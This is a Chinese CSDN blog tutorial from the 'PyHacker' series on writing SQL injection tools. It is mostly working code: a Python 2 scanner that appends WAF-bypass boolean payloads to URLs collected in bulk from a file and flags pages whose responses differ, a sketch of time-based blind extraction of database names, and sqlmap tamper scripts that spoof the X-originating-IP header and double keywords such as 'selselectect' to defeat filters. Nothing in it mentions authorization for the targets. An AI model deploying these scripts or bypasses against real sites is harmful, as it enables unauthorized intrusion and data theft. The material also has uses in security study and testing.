【PyHacker编写指南】Sql注入脚本编写

最新推荐文章于 2024-05-23 16:17:43 发布
最新推荐文章于 2024-05-23 16:17:43 发布
阅读量2.2k 收藏 23
点赞数
分类专栏: PyHacker编写指南 文章标签: python 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/XunanSec/article/details/124785389
版权

这节课是巡安似海PyHacker编写指南的Sql注入脚本编写

有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。

喜欢用Python写脚本的小伙伴可以跟着一起写一写。

编写环境:Python2.x

00x1:

需要用到的模块如下:

import requestsimport re

00x2:

编写Sql判断

首先我们需要一个payload,最好可以bypass,这样方便测试

?a=/&id=1%20and%201=1%23/
url = 'http://127.0.0.1/index.php?id=1'r = r'\?(.*)'id = re.findall(r,url)id = id[0]payload = "?a=/*&{}%20and%201=1%23*/".format(id)

Ok,可以正常输出

再匹配前面的url + payload完美bypass

 整理一下代码:

def url_bypass(url):
    r = r'\?(.*)'
    id = re.findall(r,url)
    id = id[0]
    payload = "?a=/*&{}%20and%201=1%23*/".format(id)

    urlr = '(.*)\?%s'%id
    url_ = re.findall(urlr,url)
    url_=url_[0]
    print url_+payload

url = 'http://127.0.0.1/index.php?id=1'
url_bypass(url)

存放到列表当中,等下我们直接遍历即可

00x3:

下面来说一下判断原理:

?a=/&id=1%20and%201=1%23/    返回正常?a=/&id=1%20and%201=2%23/ 返回错误
xor 1=1    返回错误xor 1=2    返回正常

判断1 != 2 则存在SQL注入漏洞(如上两条语句都可以测试)

我们分别利用两个请求测试,这样代码方便易读

def req1(url):
    global html1
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url,headers=headers,verify=False,timeout=3)
    html1 = req.content

def req2(url):
    global html2
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url,headers=headers,verify=False,timeout=3)
    html2 = req.content

00x4:

判断SQL注入漏洞

def main():    req1(urls[0])    req2(urls[1])    if html1 != html2:        print "[+] Find SQL"    else:        print "NO"

调试一下:

00x5:

配和前面的教程,我们已经可以采集url,并且深度爬取

采集就不在这里说了,你可以自己去采集一些url

遍历url 判断SQL注入漏洞:

if __name__ == '__main__':    f = open('url.txt','r')    for url in f:        url = url.strip()        url_bypass(url)  # c处理url        main() #判断SQL        urls = [] #清空列表

自动输出结果我就不写了

前面也讲了,大家可以根据自己需求修改

00x6:

完整代码:

#!/usr/bin/python
#-*- coding:utf-8 -*-
import requests
import re
import urllib3
urllib3.disable_warnings()

urls = []
def url_bypass(url):
    r = r'\?(.*)'
    id = re.findall(r,url)
    id = id[0]
    payload = "?a=/*&{}%20and%201=1%23*/".format(id)

    r2 = r'\?(.*)'
    id2 = re.findall(r2,url)
    id2 = id2[0]
    payload2 = "?a=/*&{}%20and%201=2%23*/".format(id2)

    urlr = '(.*)\?%s'%id
    url_ = re.findall(urlr,url)
    url_=url_[0]
    url_bypass =  url_+payload
    url_bypass2 = url_ + payload2
    urls.append(url_bypass)
    urls.append(url_bypass2)

def req1(url):
    global html1
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url,headers=headers,verify=False,timeout=3)
    html1 = req.content

def req2(url):
    global html2
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'
    }
    req = requests.get(url,headers=headers,verify=False,timeout=3)
    html2 = req.content

def main():
    try:
        req1(urls[0])
        req2(urls[1])
        if html1 != html2:
            print "[+] Find SQL",urls[1]
        else:
            pass
    except:
        pass

if __name__ == '__main__':
    f = open('url.txt','r')
    for url in f:
        url = url.strip()
        url_bypass(url)  # c处理url
        main() #判断SQL
        urls = [] #清空列表

这里仅以SQL判断思路进行编写,猜测数据库等操作也相同

抛砖引玉,只需要更换sql语句,利用for循环即可

大致思路:(延时注入获取数据库)

payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

遍历payloads

判断延迟时间,利用time比较,如果时间大于xxx,则字符存在

for x in payloads:  url+and if(length(user)=%s,3,0)%x

Pyhacker 之 SQLMAP tamper编写

tamper是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。

一个简单的tamper:

from lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWESTdef dependencies():    passdef tamper(payload, **kwargs):    return payload.replace("'", "\\'").replace('"', '\\"')

我们只需要修改这两部分:

Priority:定义脚本的优先级(默认lowest即可)

tamper:是主要的函数,接受的参数为payload和kwargs

返回值为替换后的payload。比如这个例子中就把引号替换为了\

def tamper(payload, **kwargs):headers = kwargs.get("headers", {})    headers["X-originating-IP"] = "127.0.0.1"    return payload

修改X-originating-IP 绕过Waf

所以我们只需要仿造进行修改,即可写出我们的tamper

我们来测试一下

 

我们修改源代码,关键词 替换为空

 

OK,没毛病

替换为空了,我们可以利用两个seleselectct 绕过

测试一下:

Sqlmap.py -u "http://127.0.0.1/news.php?id=1" --purge

已经注入不出来结果了,我们来写一个tamper

利用replace函数进行替换字符

完整tamper:

#!/usr/bin/python
#-*- coding:utf-8 -*-

#默认开头
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW     #等级(LOWEST 最低级)

#可有可无
def dependencies():
    pass

def tamper(payload, **kwargs):
    playload = payload.replace('and','anandd')
    playload = playload.replace('xor', 'xoxorr')
    playload = playload.replace('select', 'selselectect')
    playload = playload.replace('union', 'uniunionon')
    playload = playload.replace('if', 'iiff')
    return playload

放到tamper目录下

Sqlmap.py -u "http://127.0.0.1/news.php?id=1" --purge --tamper "andand.py"


OK,已经注入出来了

方法大同小异,了解waf特征,fuzz bypass

微信公众号关注:巡安似海,每天更新技术文章,网络安全,免杀攻防等文章。

巡安似海
关注
  • 0
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入
weixin_47535681的博客
06-03 305
SQL注入
SQL注入脚本
ChiYanq7ng的博客
11-21 132
【代码】SQL注入脚本。
手把手教你用Python轻松玩转SQL注入
最新发布
菜鸟学识的博客
05-23 1232
大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。总的来说,SQL注入无非就是一段艰难险阻的路程,你可以发现但是别人也可以防御,虽然你发现要比较久的时间,但是人家防御却是很轻松,个人觉得得不偿失,不建议大家深入了解,只是做个简单的介绍了解下就好,至少你搜索技能因此而提高了不少吧。
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1005
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
如何用python开发自动化SQL注入脚本
haoahaoahaoahao的博客
01-11 2097
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为%d"%(i,usn_len))print("[-]第%d张表名为: %s" % (i, tab_name))
Python安全之编写SQL注入漏洞利用脚本(EXP)
gaojian5422的博客
02-28 1479
本例中以靶机DVWA中的盲注为例。
自己动手编写SQL注入漏洞扫描工具
12-31
5. **自动化扫描**:编写脚本或程序,模拟用户输入,尝试注入攻击,观察返回结果,判断是否存在漏洞。 6. **HTTP请求与响应分析**:理解HTTP协议,学会分析HTTP头和响应体,识别异常状态码、错误信息或敏感数据泄露...
自己动手编写SQL注入漏洞扫描器
12-24
自己动手编写SQL注入漏洞扫描器
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
freeking101的博客
07-03 8138
SQL 注入 SQL注入就是通过把 SQL 命令插入到 Web表单提交 或 输入域名 或 页面URL请求查询的字符串,最终达到欺骗服务器执行恶意的 SQL命令,假如管理员没有对 id 参数进行过滤那么黑客可以通过数据传输点将恶意的SQL语句带入查询。 sqlmap sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 831
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
渗透测试之sql注入
weixin_46420165的博客
12-08 2174
SQL 注入(SQL Injection)是发生在 Web 程序中数据库层的安全漏洞,是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。
python sql注入检测脚本_sql注入脚本
weixin_36484714的博客
02-09 1211
摘要本篇文章对原理的解释占据主要,输出的美化部分不做详细解释一. 成果展示假设我的数据库有这些那么通过sql注入把所有数据库的所有表所有字段和所有的内容查找出来 二. 原理对sql-labs的前四关有效,其实程序是根据sqli-lab的特点而不是像强大的工具sqlmap一样可以完全实现sql注入,而今天的核心就在于三个表达式select * from users where id='-1' uni...
[DVWA]利用SQL注入漏洞的方法
weixin_45942044的博客
11-22 1006
自学[DVWA]SQL注入漏洞的学习笔记
Mybatis-Plus 自定义SQL注入器,非常实用!
m0_71777195的博客
06-04 2456
我们在使用Mybatis-Plus时,dao层都会去继承BaseMapper接口,这样就可以用BaseMapper接口所有的方法,BaseMapper中每一个方法其实就是一个SQL注入器在Mybatis-Plus的核心(core)包下,提供的默认可注入方法有这些:那如果我们想自定义SQL注入器呢,我们该如何去做?比如在Mybatis-Plus中调用updateById方法进行数据更新默认情况下是不能更新空值字段的。而在实际开发过程中,往往会遇到需要将字段值更新为空值的情况。
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1373
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
sql注入详解
m0_67392811的博客
06-12 5851
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 686
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
DVWA中的SQL注入攻防实战指南
在这个场景下,我们关注的是SQL注入漏洞,这是一种常见的网络安全问题,允许攻击者通过构造恶意的SQL语句来操纵数据库。" 在DVWA的SQL注入部分,我们可以学习到以下关键知识点: 1. **SQL注入基础**:SQL注入是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

巡安似海

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值